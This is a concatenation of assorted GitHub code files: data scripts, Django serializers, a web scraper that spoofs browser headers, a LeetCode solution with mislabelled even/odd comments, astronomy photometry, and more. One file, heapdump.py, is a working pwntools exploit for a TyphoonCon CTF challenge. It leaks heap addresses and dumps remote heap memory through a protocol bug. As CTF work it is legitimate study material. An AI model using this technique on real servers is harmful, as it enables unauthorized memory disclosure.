train()\n","repo_name":"justinphan3110/deepspeed_lora","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"20123829899","text":"import csv\n\ndata_month = {\n '01': 
'well_jan_2018.csv',\n    '02': 'well_feb_2018.csv',\n    '03': 'well_march_2018.csv',\n    '04': 'well_april_2018.csv',\n    '05': 'well_may_2018.csv',\n    '06': 'well_june_2018.csv',\n    '07': 'well_july_2018.csv',\n    '08': 'well_august_2018.csv',\n    '09': 'well_sept_2018.csv',\n    '10': 'well_oct_2018.csv'\n}\n\n\ndef extract_and_write(month, filename, writer):\n    with open(filename) as file_pointer:\n        file_pointer.readline()\n        for line in file_pointer:\n            line = line.lower()\n\n            if line.startswith(\"total\"):\n                print(\"last line\", line)\n                break\n\n            data = line.split(\",\")\n            day = data[0]\n            date_time = '2018-' + month + '-' + day\n\n            well_total = 0\n            for i in range(1,18):\n                try:\n\n                    well_i = float(data[i])\n                    well_total = well_total + well_i\n                    writer.writerow([date_time, i, well_i])\n                except:\n                    print(\"Something went wrong: date\", date_time, \"; data:\", data)\n                    break\n            if well_total <= 0.1:\n                print(\"not a valid calendar day:\", date_time)\n                continue\n            day_total = float(data[len(data) - 1])\n            if well_total != day_total:\n                print(\"invalid calculation for day:\", date_time, \";total=\", day_total, \"; calculated:\", well_total)\n\n\nwith open(\"well_daily.csv\", \"w\", newline='') as csvfile:\n    my_writer = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n    my_writer.writerow([\"date\", \"well\", \"pump\"])\n\n    for m, filePath in data_month.items():\n        extract_and_write(month=m, filename='../confi_data/well_water/' + filePath, writer=my_writer)\n        # break","repo_name":"litpuvn/water-audit","sub_path":"data/create_well_daily_data.py","file_name":"create_well_daily_data.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34362879581","text":"from sys import argv\n\"\"\" \nscript, userName, school = argv\n\nprompt = '> '\n\nprint(f\"Hi {userName}, I'm the {script} script.\")\n\nprint(\"I'd like to ask you a few questions.\")\n\nprint(f\"Do you like me {userName}?\")\n\nlikes = input(prompt)\n\nprint(f\"Where do you live {userName}?\")\nlives = input(prompt)\n\nprint(f\"What kind of computer do you have?\")\n\ncomputer = input(prompt)\n\nprint(f\"\"\"\n#Alright, so you said {likes} about liking me.\n#You live in {lives} and you're a student of {school}. Not sure where that is.\n#And you have a {computer}. 
Nice.\n#\"\"\") \"\"\"\n\nscript, fileName = argv\n\nprompt = \">> \"\n\nprint('Do you want to clear content of the file?')\nreply = input(prompt)\n\nif reply == \"Yes\" or reply == \"yes\":\n #open the file\n fileToOpen = open(fileName, 'w')\n \n fileToOpen.truncate()\n fileToOpen.close()\n \n print(\"File content was cleared successfully\")\n\nelse:\n print('Do you want to write to the file?')\n reply = input(prompt)\n\n if reply == \"Yes\" or reply == \"yes\":\n \n print('Enter the content for the file')\n \n content = input(prompt)\n \n fileToOpen = open(\"sample.txt\", 'a')\n\n fileToOpen.write(\"\\n\"+content)\n\n fileToOpen.close()\n\n print(\"Your contents have been saved to file\")\n\n else:\n\n print(\"Nothing happened to file\") \n\n\n","repo_name":"hagios2/Py-Tutorials","sub_path":"ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41074569464","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport requests #用来抓取网页的html源码\nimport random #取随机数\nimport time #时间相关操作\nfrom bs4 import BeautifulSoup #用于代替正则式 取源码中相应标签中的内容\n\ndef get_content(url, data = None):\n #设置headers是为了模拟浏览器访问 否则的话可能会被拒绝 可通过浏览器获取\n header = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Connection': 'keep-alive',\n 'Accept-Encoding': 'br, gzip, deflate',\n 'Accept-Language':'zh-cn',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15'\n }\n #设置一个超时时间 取随机数 是为了防止网站被认定为爬虫\n timeout = random.choice(range(80,180))\n\n while True:\n try:\n req = requests.get(url=url, headers = header, timeout = timeout,)\n break\n except Exception as e:\n time.sleep(random.choice(range(8, 15)))\n return req.content.decode('gb2312','ignore').encode('utf-8')\n\nif __name__ == '__main__':\n serverurl = 'https://www.iimanhua.com'\n url = 'https://www.iimanhua.com/comic/2362/'\n html = get_content(url)\n soup = BeautifulSoup( html ,'html.parser')\n # 小说图片\n sectionList = soup.find(attrs={'id':'play_0'}).ul.find_all('li')\n for section in sectionList:\n print(section.a[\"href\"])\n print(section.a[\"title\"])\n","repo_name":"ygg404/gis","sub_path":"UtilTool/UtilBz/ii/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72900680542","text":"\"\"\"\nhttps://leetcode.com/problems/minimize-deviation-in-array/\n\"\"\"\n\n\nfrom heapq import heappush, heappop\n\n\nclass Solution:\n def minimumDeviation(self, nums: List[int]) -> int:\n \"\"\"\n 1. For each number in the given list, calculate the lower and the\n higher bound it could reach:\n 1.1 For odd numbers, it is [x, x * 2].\n 1.2 For even numbers, it is\n [keep divide by 2 until it becomes an odd number, x].\n\n 2. Then store those bounds into a heap and set the initial difference\n to the maximum lower bound - the minimum lower bound.\n\n 3. 
Then we keep looking at the smallest lower bound in the heap:\n 3.1 If lower bound * 2 is still less than higher bound, we push\n [lower * 2, higher] to the heap.\n 3.2 Else, we could add increase the smallest lower bound any more,\n thus the current difference is our answer.\n \"\"\"\n def get_bound(i: int) -> tuple[int]:\n if i & 1: # Even number:\n return (i, i << 1)\n else: # Odd number.\n low = i\n while not low & 1:\n low >>= 1\n\n return (low, i)\n\n maxVal = float('-inf')\n h = []\n for num in nums:\n low, high = get_bound(num)\n heappush(h, (low, high))\n maxVal = max(maxVal, low)\n\n minDiff = maxVal - h[0][0]\n while True:\n low, high = heappop(h)\n if low >= high: # Could not increase lower bound any more.\n break\n\n low <<= 1\n maxVal = max(maxVal, low)\n heappush(h, (low, high))\n minDiff = min(minDiff, maxVal - h[0][0])\n\n return minDiff\n","repo_name":"eronekogin/leetcode","sub_path":"2021/minimize_deviation_in_array.py","file_name":"minimize_deviation_in_array.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4980224731","text":"import sys\nfrom pwn import *\n\nREMOTE_ADDR = '10.0.2.2'\nREMOTE_PORT = 13337\n\nif len(sys.argv) > 1:\n REMOTE_ADDR = sys.argv[1]\n\n# Target string copied from 0x0134823C into buffers[254].\n\n# There is a data structure holding the messages for each thread like\n# struct thread_input\n# {\n# __int64 thread_index;\n# __int64 len;\n# char *buf;\n# };\n# The thread index is incremented for every child socket that connects.\n# The other two fields are used differently depending on the command sent.\n\n# Layout of a network message frame:\n# 0-4: magic number 0xdeadbeef\n# 5: number of commands in this frame\n# 6: command id (0, 2, 3, 4)\n# next bytes depend on command id\n\n# Command 0: No Op\n# len and buf = 0\n\n# Command 2: To uppercase (AND 0xdf)\n# Command 3: To lowercase (OR 0x20)\n# 1 byte: length of string\n# rest: content of string\n# Content is copied into one of the buffers allocated at the start of the application.\n\n# Command 4:\n# 4 bytes: number1\n# 4 bytes: number2\n# Puts the following in the above thread_input struct\n# len = number1 % number2\n# buf = number1 * number2\n\n\ndef send_toupper(strings, expected_min_length=1):\n if len(strings) > 0xff:\n raise Exception(\"Too many strings {} > 255\".format(len(strings)))\n # magic number of commands command id\n frame = p32(0xdeadbeef) + p8(len(strings)) + p8(2)\n\n for s in strings:\n if len(s) > 255:\n raise Exception(\"String too long {} > 255\".format(len(s)))\n frame += p8(len(s))\n frame += s\n \n # Only recv 4096 bytes chunks.\n if len(frame) > 4096:\n raise Exception(\"Frame too large. 
{} > 4096\".format(len(frame)))\n r.send(frame)\n\n recv_frames = b''\n while len(recv_frames) < expected_min_length:\n recv_frames += r.recv(timeout=60)\n #print(hexdump(recv_frames))\n \n # Parse the response.\n assert(u32(recv_frames[:4]) == 0xdeadbeef)\n num_strings = u8(recv_frames[4])\n command_id = u8(recv_frames[5])\n log.info('Received {} strings for command {}'.format(num_strings, command_id))\n assert(command_id == 2)\n\n strings = []\n offs = 6\n for i in range(num_strings):\n length = u8(recv_frames[offs:offs+1])\n strings.append((length, recv_frames[offs+1:offs+1+length]))\n #log.info('Message {}: {:x} | {}'.format(i, strings[i][0], strings[i][1]))\n offs += length + 1\n return strings, recv_frames\n\ndef send_address(addresses):\n if len(addresses) > 0xff:\n raise Exception(\"Too many addresses {} > 255\".format(len(addresses)))\n # magic number of commands command id\n frame = p32(0xdeadbeef) + p8(len(addresses)) + p8(4)\n\n for a in addresses:\n needed_length = a[1]\n while a[0] % needed_length != 0:\n needed_length += 1\n frame += p32(needed_length) + p32(a[0] // needed_length)\n \n r.send(frame)\n if len(frame) > 4096:\n raise Exception(\"Frame too large. {} > 4096\".format(len(frame)))\n\n recv_frames = r.recv(timeout=60)\n #print(hexdump(recv_frames))\n\n assert(u32(recv_frames[:4]) == 0xdeadbeef)\n num_commands = u8(recv_frames[4])\n command_id = u8(recv_frames[5])\n log.info('Received {} messages for command {}'.format(num_commands, command_id))\n assert(command_id == 4)\n\n expected_size = 6 + num_commands * 8\n if len(recv_frames) < expected_size:\n log.warn('Response truncated! {} < {}'.format(len(recv_frames), expected_size))\n recv_frames += r.recv()\n\n commands = []\n for i in range(num_commands):\n offs = 6 + 8 * i\n commands.append((u32(recv_frames[offs:offs+4]), u32(recv_frames[offs+4:offs+8])))\n #log.info('Message {}: {:x} | {:x}'.format(i, commands[i][0], commands[i][1]))\n return commands\n\nr = remote(REMOTE_ADDR, REMOTE_PORT)\n\nlog.info('Putting heap addresses of buffers into the vector.')\n# first put the address of the 253 buffer into the list\nsend_toupper(['A']*253)\n\n# Abuse the bug, that the per-thread message vectors in the child threads\n# are persistent over different received messages.\n# So the items you've added using one command will be sent back using\n# the response packing code of the current command.\n# You can use the multiply and modulo command #4 to leak the addresses of the\n# buffers put into the vector by the previous ascii-to-uppercase command #2 above.\n# Same way around you can craft any address using command #4 and print the memory using command #2 later.\nlog.info('Leak the addresses.')\nKUSER_SHARED_DATA = 0x7ffe0000 # use some pointer we can be sure is valid\nresponse = send_address([(KUSER_SHARED_DATA, 1)])\n\n# Heap addresses are growing in 0x10000 chunks. \n# Since the buffers are all malloc'd in sequence their addresses\n# grow nearly sequencially. 
# Heap addresses are growing in 0x10000 chunks.\n# Since the buffers are all malloc'd in sequence, their addresses\n# grow nearly sequentially. So we assume the last buffer allocated,\n# which contains the target \"TyphoonCon\" string, is in the range around\n# where the other high buffer addresses are.\naddresses = [a[1] & 0xfffff000 for a in response[:-1]]\naddresses = list(set(addresses))\naddresses.sort()\n#print(addresses)\n\n# Dump the last 0xa000 bytes around the end of the known heap buffer addresses.\nDUMP_SIZE = 0xa000\n#DUMP_SIZE = 0x10000\n# Integer division keeps the page bounds ints (a float would break range() below).\nfirst_heap_page = addresses[-1] - (DUMP_SIZE // 2)\nlast_heap_page = addresses[-1] + (DUMP_SIZE // 2)\nr.close()\n\n# Start a new session, so we have a fresh message queue.\nr = remote(REMOTE_ADDR, REMOTE_PORT)\nlog.info('Dumping heap 0x{:x} - 0x{:x} ({:x} bytes)'.format(first_heap_page, last_heap_page, DUMP_SIZE))\n\n# Depending on the heap base address, get as much data per message as possible,\n# given the formula used in message handler 4.\n# 4 bytes: new_len = len % buf\n# 4 bytes: new_buf = buf * len\ndef find_largest_possible_size(addr):\n    largest_possible_size = 0\n    for i in range(addr, 0, -1):\n        if addr % i != 0:\n            continue\n        sent_buf = addr // i\n        resulting_len = i % sent_buf\n        if resulting_len == i and resulting_len > largest_possible_size:\n            largest_possible_size = resulting_len\n    return largest_possible_size\n\naddresses = []\naddr = first_heap_page\nwhile addr < last_heap_page + 0x1000:\n    size = find_largest_possible_size(addr)\n    addresses.append((addr, size))\n    addr += size
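# Sanity check of the chunk sizing above (my own example, not from the
# source): resulting_len == i holds exactly when i < addr // i, so
# find_largest_possible_size returns the largest divisor i of addr with
# i * i < addr; e.g. find_largest_possible_size(0x30000) == 0x180.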
# The size returned to the user is only 1 byte,\n# but all 4 bytes are used for the size when copying the values.\n# So we can have it return longer chunks of data than the command #2\n# usually allows due to the 1 byte length field.\nsend_address(addresses)\n\n# See if we found the winning string in the dump.\n_, recv_frames = send_toupper([b'B'], DUMP_SIZE)\nif b'TyphoonCon' in recv_frames:\n    string_start = recv_frames.index(b'TyphoonCon')\n    target_string = recv_frames[string_start:string_start+38]\n    log.success('Found target string: {}'.format(target_string))\nelse:\n    log.failure('Target string wasn\\'t in the dumped heap area. Exploit failed.')\nr.close()","repo_name":"ssd-secure-disclosure/typhooncon2019","sub_path":"TyphoonCon Challenge 2019/Peace-Maker/heapdump.py","file_name":"heapdump.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"7"}
{"seq_id":"33544907022","text":"\n\"\"\"Define functions to use in redis queue.\"\"\"\nimport time\nimport hashlib\n\nfrom rq import get_current_job\n\n\ndef hash_work(data_input, iterations):\n    job = get_current_job()\n    print(\"sleeping for 5 sec\")\n    time.sleep(5)\n    print(\"done sleeping\")\n    print(f\"data_input is {data_input}\")\n    # Note: data_input is only logged; the hash chain below starts from b\"\".\n    output = b\"\"\n    for i in range(iterations - 1):\n        output = hashlib.sha512(output).digest()\n    output = hashlib.sha512(output).digest().hex()\n    print(f\"output is {output}\")\n    return {\"job_id\": job.id,\n            \"output_hash\": output}","repo_name":"sonegoh/cloud_computing","sub_path":"hw2/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
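# Hypothetical usage sketch for the record above (queue setup and arguments
# are my assumptions, not from the source): hash_work is meant to be enqueued
# on an rq worker backed by Redis.
#
#     from redis import Redis
#     from rq import Queue
#
#     q = Queue(connection=Redis())  # assumes a Redis server on localhost
#     job = q.enqueue(hash_work, b"seed", 1000)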
serializers.ValidationError(\"Order Item dose not exist\")\n item_instance.count = item_count\n if item_instance.is_available():\n # item_instance.save() ------------------------------->save\n edited_items.append(item_instance)\n price += item_instance.get_price()\n else:\n raise serializers.ValidationError(\"This number of product is not available in stock\")\n\n # --------------------------------------------------> crete new order item\n elif not item_id:\n item_instance = OrderItem(order=instance, **item_data)\n if item_instance.is_available():\n new_items.append(item_instance)\n price += item_instance.get_price()\n else:\n raise serializers.ValidationError(\"This number of product is not available in stock\")\n\n\nclass DeliveryInformationSerializer(serializers.ModelSerializer):\n class Meta:\n model = DeliveryInformation\n fields = ('id', 'user', 'first_name', 'last_name', 'phone_number', 'address', 'postal_code')\n\n\nclass CheckoutSerializer(serializers.ModelSerializer):\n delivery_information = DeliveryInformationSerializer()\n order = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = Checkout\n fields = ('id', 'order', 'delivery_information', 'order', 'post_type', 'send_cost')\n","repo_name":"K-Roozbahani/Plant_Shop","sub_path":"plant_shop/orders/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71363557985","text":"from django.db import models\n\n\nclass People(models.Model):\n name=models.CharField(max_length=255)\n age=models.IntegerField()\n\n class Meta:\n verbose_name=\"Pessoa\"\n verbose_name_plural=\"Pessoas\"\n ordering=['name']\n \n def __str__(self):\n return self.name","repo_name":"lvleo21/django-custom-management-commands","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"21062432919","text":"import streamlit as st\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\ndef main():\n st.title(\"ml app\")\n generate_random = np.random.RandomState(667)\n inprand=st.slider(\"inserisci valore punti random\",1,1000,50)\n x = 10 * generate_random.rand(inprand)\n mu=0\n sigma=st.slider(\"inserisci sigma\",0,10,1)\n s=np.random.normal(mu,sigma,inprand)\n coe=st.slider(\"inserisci coeficente angolare\",1,10,1)\n y = coe * x + s\n fig =plt.figure(figsize = (10, 8))\n X=x.reshape(-1,1)\n\n model=LinearRegression()\n model.fit(X,y)\n y_pred=model.predict(X) #predice \n\n plt.scatter(x, y)\n plt.plot(x, y_pred,'-r')\n plt.title('Simple Linear Regression')\n plt.axis([0,10,0,30]) #fissare l'asse \n st.pyplot(fig)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Ahmexxx/app","sub_path":"atest/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6204303994","text":"import numpy as np\nimport os\nfrom pathlib import Path\nfrom astropy.io import fits\nfrom astropy.stats import sigma_clipped_stats\nfrom scipy.stats import iqr\nimport sys\n\nlocal = (str(os.path.abspath(os.getcwd())))\npath = Path(local)\nprint('local path:', path)\n\nreftime = str(input('Enter time intervall of refimage (e.g. 
\"2014-22\"): '))\n\nreffile = list(path.glob('ref*'+reftime+'.fits'))\nreffile_error = list(path.glob('error_ref*'+reftime+'.fits'))\nif len(reffile) != 1 or len(reffile_error) != 1:\n print('#### REFERENCE FILE ERROR ####')\n sys.exit('Interrupting galref_apparentmagoffset.py')\n\ndef make_galfit_input_file(data_file_name, error_file_name, object_region, position, fluxesti, second_fit):\n galfit_input_txt = open(\"galfit.input\", \"w\")\n galfit_input_txt.write(\"A) \"+str(data_file_name)+\" \\n\" +\n \"B) out.fits \"+\"\\n\" +\n \"C) \"+str(error_file_name)+\" \\n\" +\n \"D) psf.fits \"+\"\\n\" +\n \"E) 1 \"+\"\\n\" +\n \"F) \"+\"\\n\" +\n \"G) \"+\"\\n\" +\n \"H) \"+str(object_region)+\" \\n\" +\n \"I) 51 51 \"+\"\\n\" +\n \"J) 25.000 \"+\"\\n\" +\n \"K) 0.387 0.387 \"+\"\\n\" +\n \"O) regular \"+\"\\n\" +\n \"P) 0 \"+\"\\n\" +\n \"S) 0 \"+\"\\n\" +\n \"0) q2237 \"+\"\\n\" +\n \" 1) \"+str(position)+\" 1 1 \"+\"\\n\" +\n \" 3) \"+str(fluxesti)+\" 1 \"+\"\\n\" +\n \" 4) \"+str(second_fit)+\"\\n\" +\n \" 5) 0.0 0 \"+\"\\n\" +\n \" 6) 0.0 0 \"+\"\\n\" +\n \" 7) 0.0000 0 \"+\"\\n\" +\n \" 8) 1.0000 0 \"+\"\\n\" +\n \" 9) 0.0000 0 \"+\"\\n\" +\n \"10) 0.0000 0 \"+\"\\n\" +\n \" Z) 0 \"+\"\\n\" +\n \" 0) sky \"+\"\\n\" +\n \" 1) 10.0 1 \"+\"\\n\" +\n \" 2) 0.0000 0 \"+\"\\n\" +\n \" 3) 0.0000 0 \"+\"\\n\" +\n \" Z) 0 \")\n galfit_input_txt.close()\n\n# ref-stars:\n# initial guesses for star positions for aperture photometry for scale factors:\n# q2237:\n\n\nif str(path).find('q2237') != -1:\n print('refstars of quasar: q2237')\n initial_positions = np.array([[1578.0, 1825.0], [1600.0, 1586.0], [2066.0, 1498.0], [2203.0, 1689.0], [1890.0, 1904.0],\n [1837.0, 2049.0], [1677.0, 1991.0], [1271.0, 1603.0], [2191.0, 2213.0], [2421.0, 2327.0],\n [1721.0, 2276.0], [1505.0, 2288.0], [1339.0, 2281.0], [1052.0, 1921.0], [ 812.0, 1835.0],\n [ 874.0, 1565.0], [1123.0, 1287.0], [1408.0, 1368.0], [2055.0, 1346.0], [2732.0, 1166.0],\n [3266.0, 2570.0]])\n# he2149:\nif str(path).find('he2149') != -1:\n print('refstars of quasar: he2149')\n initial_positions = np.array([[2013.0, 1854.0], [1274.0, 1823.0], [1280.0, 1650.0], [2150.0, 1518.0], [2239.0, 1552.0],\n [2199.0, 1889.0], [2482.0, 1831.0], [1851.0, 1891.0], [1086.0, 1854.0], [1043.0, 1618.0],\n [ 993.0, 1574.0], [ 959.0, 1523.0], [1190.0, 1986.0], [ 507.0, 1928.0], [ 656.0, 1384.0],\n [1602.0, 1381.0], [1823.0, 1359.0], [2387.0, 1375.0], [2898.0, 2169.0], [2733.0, 2107.0],\n [2318.0, 2246.0], [1793.0, 2304.0], [1595.0, 1049.0], [1504.0, 763.0]])\n# he1104:\nif str(path).find('he1104') != -1:\n print('refstars of quasar: he1104')\n initial_positions = np.array([[1816.0, 1649.0], [1847.0, 1657.0], [2080.0, 1895.0], [2159.0, 1977.0], [1354.0, 1910.0],\n [1210.0, 1983.0], [1662.0, 882.0], [ 977.0, 900.0], [2814.0, 1040.0], [3018.0, 1638.0],\n [2849.0, 2156.0], [2228.0, 2063.0], [1742.0, 2317.0], [1304.0, 2398.0], [ 364.0, 2267.0],\n [ 992.0, 1694.0], [1087.0, 1443.0], [1826.0, 1707.0], [1805.0, 1760.0], [2342.0, 729.0],\n [ 782.0, 1648.0], [3082.0, 737.0]])\n\n# converts to ['abcd wxyz',...] 
# converts to ['abcd wxyz', ...] where abcd and wxyz are the ds9 pixel positions (in the order given by ds9):\nref_positions = [str(np.array(x, dtype=int))[1:-1]\n                 for x in initial_positions.tolist()]\n\n# print(ref_positions)\n\n# ref_regions:\nhalfside = 15 # size (half side) of region around ref-stars\nref_regions = []\nfor position in ref_positions:\n    xy_pos = position.split()\n    center = np.floor(\n        np.array([float(xy_pos[0]), float(xy_pos[1])])).astype(int)\n    edge1, edge2, edge3, edge4 = center[0]-halfside, center[0] + \\\n        halfside, center[1]-halfside, center[1]+halfside\n    region = str(edge1)+' '+str(edge2)+' '+str(edge3)+' '+str(edge4)\n    ref_regions.append(region)\n# print(ref_regions)\n\nreffile = str(reffile[0]).replace(str(path)+'/', '')\nreffile_error = str(reffile_error[0]).replace(str(path)+'/', '')\nprint('reffile:', reffile)\ndata = fits.open(reffile)\n# remove possible remaining background from ref-image:\nmean, median, std = sigma_clipped_stats(\n    data[0].data[100:-100, 100:-100], sigma=3.0, std_ddof=1)\nbackground = median\n# std, i.e. the typical fluctuation size of the individual background pixels\nerror_background = std\n# The background error was already accounted for in the error image during the original combining (only in the diff attempts was the negative minimum of the image sometimes added back in and saved).\nprint('ref-image background =', background, '+/-', error_background)\nrefimage_backred = data[0].data - background\nprint('make psf.fits')\nif str(path).find('q2237') != -1:\n    psf_cutout = refimage_backred[2120:2150, 2213:2243]\nif str(path).find('he2149') != -1:\n    psf_cutout = refimage_backred[1703:1733, 1786:1816]\nif str(path).find('he1104') != -1:\n    psf_cutout = refimage_backred[1770:1800, 1700:1730]\npsf_fits = fits.PrimaryHDU(psf_cutout)\npsf_fits = fits.HDUList([psf_fits])\npsf_fits[0].data = psf_cutout\npsf_fits.writeto('psf.fits', overwrite=True)\n\nref_fluxes = np.zeros(len(ref_regions))\nprint('reference star measurements:')\nfor ref_star in range(len(ref_regions)):\n    print('refstar no.', str(ref_star+1))\n    refstar_region = ref_regions[ref_star]\n    refstar_position = ref_positions[ref_star]\n    no_second_fit = ' 0.0 0'\n    fluxestimate = '50000.0'\n    make_galfit_input_file(reffile, reffile_error, refstar_region,\n                           refstar_position, fluxestimate, no_second_fit)\n    # execute galfit with no console output\n    os.system('./galfit galfit.input > /dev/null')\n    os.system('rm galfit.??') # remove extra files produced by galfit\n    os.system('rm out.fits') # remove output fits file
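    # Note on the parsing below (my reading of the slice, not from the galfit
    # docs): f.readlines()[7:9] keeps the two fit.log lines that hold the
    # fitted component values, and the flux is then pulled out of the first one.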
    try:\n        with open('fit.log') as f:\n            galfit_ref_results = f.readlines()[7:9]\n        # print(galfit_ref_results)\n        os.system('rm fit.log') # remove fit.log\n    except:\n        print('refstar-galfit-error with refstar',\n              str(ref_star+1), '! --> skipped!')\n        continue\n    ref_star_flux = galfit_ref_results[0].split()[4]\n    if ')' in ref_star_flux:\n        ref_fluxes[ref_star] = galfit_ref_results[0].split()[5]\n    elif ',' in ref_star_flux:\n        ref_fluxes[ref_star] = galfit_ref_results[0].split()[6]\n    else:\n        ref_fluxes[ref_star] = ref_star_flux\n\nprint('refstar fluxes:',ref_fluxes)\nref_mag = -2.5*np.log10(ref_fluxes)\nprint('calculated refstar magnitudes:',ref_mag)\n\n# Compare refstar magnitudes with true values from GAIA data:\n\n\ndef GAIA_GminusV(Gbp, Grp):\n    x = Gbp-Grp\n    return -0.02704+0.01424*x-0.2156*x**2+0.01426*x**3\n\n\ndef GAIA_GminusR(Gbp, Grp):\n    x = Gbp-Grp\n    return -0.02275+0.3961*x-0.1243*x**2-0.01396*x**3+0.003775*x**4\n\n\ndef GAIA_V(GminusV, G):\n    return G-GminusV\n\n\ndef GAIA_R(GminusR, G):\n    return G-GminusR\n\nif str(path).find('q2237') != -1:\n    GAIAdata_table = '../q2237gaiaDR3table.csv'\nif str(path).find('he2149') != -1:\n    GAIAdata_table = '../he2149gaiaDR3table.csv'\nif str(path).find('he1104') != -1:\n    GAIAdata_table = '../he1104gaiaDR3table.csv'\n\nG,Gbp,Grp,compareRApm,compareDECpm = np.genfromtxt(GAIAdata_table,dtype=float,skip_header=1,delimiter=',',usecols=(69,74,79,13,15),unpack=True)\n# print(G,Gbp,Grp)\n\nif str(path).find('/V/') != -1:\n    GAIA_ref_mag = GAIA_V(GAIA_GminusV(Gbp, Grp), G)\n\nif str(path).find('/R/') != -1:\n    GAIA_ref_mag = GAIA_R(GAIA_GminusR(Gbp, Grp), G)\n\n# print(GAIA_ref_mag)\n\nRA,DEC,RApm,DECpm = np.loadtxt('../gaia_pixelpositionandpm_list.txt',skiprows=1,usecols=(0,1,2,3),unpack=True)\n# print(RA,DEC)\n# print(len(RA),len(GAIA_ref_mag))\n\ncounter = 0\nfor i in range(len(compareRApm)):\n    pmdiff = np.sqrt((compareRApm[i]-RApm)**2+(compareDECpm[i]-DECpm)**2)\n    mindex = np.argmin(pmdiff)\n    if pmdiff[mindex] == 0.0:\n        # pmdiff[mindex] should be zero\n        #print(pmdiff[mindex],compareRApm[i],RApm[mindex],compareDECpm[i],DECpm[mindex])\n        counter = counter + 1\nGAIA_RA = np.zeros(counter)\nGAIA_DEC = np.zeros(counter)\nGAIA_MAG = np.zeros(counter)\ncounter2 = 0\nfor i in range(len(compareRApm)):\n    pmdiff = np.sqrt((compareRApm[i]-RApm)**2+(compareDECpm[i]-DECpm)**2)\n    mindex = np.argmin(pmdiff)\n    if pmdiff[mindex] == 0.0:\n        GAIA_RA[counter2] = RA[mindex]\n        GAIA_DEC[counter2] = DEC[mindex]\n        GAIA_MAG[counter2] = GAIA_ref_mag[i]\n        counter2 = counter2 + 1\n\n#print(GAIA_RA,GAIA_DEC,GAIA_MAG)\n\n# match GAIA data to refstars:\nref_mag_GAIA = np.zeros(len(ref_mag))\nmatch_threshold = 15.0 # distance in pixels must be below this to have a match\ntrimmedpixel = 100 # between aligning and combining/galfitting\nfor i in range(len(ref_mag)):\n    # starpmRA/DEC_forgooddata will be written to good.data and:\n    distance = np.sqrt((initial_positions[i][0]-(GAIA_RA-trimmedpixel))**2+(initial_positions[i][1]-(GAIA_DEC-trimmedpixel))**2)\n    mindex = np.argmin(distance)\n    print('distance of best match:',distance[mindex])\n    if distance[mindex] < match_threshold: \n        #print(distance[mindex],initial_positions[i][0],GAIA_RA[mindex]-trimmedpixel,initial_positions[i][1],GAIA_DEC[mindex]-trimmedpixel)\n        ref_mag_GAIA[i] = GAIA_MAG[mindex]\n    else:\n        print('no match --> mag set to NAN')\n        ref_mag_GAIA[i] = np.nan\n\nprint('refstar magnitudes from GAIA:',ref_mag_GAIA)\ndiff_mag = ref_mag_GAIA-ref_mag\nprint('difference of refstar magnitudes GAIA-GALFIT:',diff_mag)\nprint('####')\noffset = np.nanmedian(diff_mag)\nofferr = iqr(diff_mag,nan_policy='omit')/2.0
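# Worked example of the offset estimate (my own numbers, not from the source):
# a refstar with GALFIT flux 10000 has instrumental magnitude
# -2.5*log10(10000) = -10; if its GAIA magnitude is 15.2, it contributes a
# difference of 15.2 - (-10) = 25.2, and the offset adopted below is the
# median of these differences with half the interquartile range as its error.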
print('magnitude offset, i.e. median of the differences (with iqr error):')\nprint('offset =',offset,'+/-',offerr)\nprint('####')\n\ntxt = open(\"refimage_\"+reftime+\"_magnitude_offset.txt\", \"w\")\ntxt.write(\"offset\"+\"\\t\\t\\t\"+\"error\"+\"\\n\")\ntxt.write(str(offset)+\"\\t\"+str(offerr))\ntxt.close()\nprint('offset written in txt-file:',\"refimage_\"+reftime+\"_magnitude_offset.txt\") \nprint('galref_apparentmagoffset.py is finished!')","repo_name":"sorgenfrei-c95/qsoMLdiffcurves","sub_path":"galref_apparentmagoffset.py","file_name":"galref_apparentmagoffset.py","file_ext":"py","file_size_in_byte":11198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}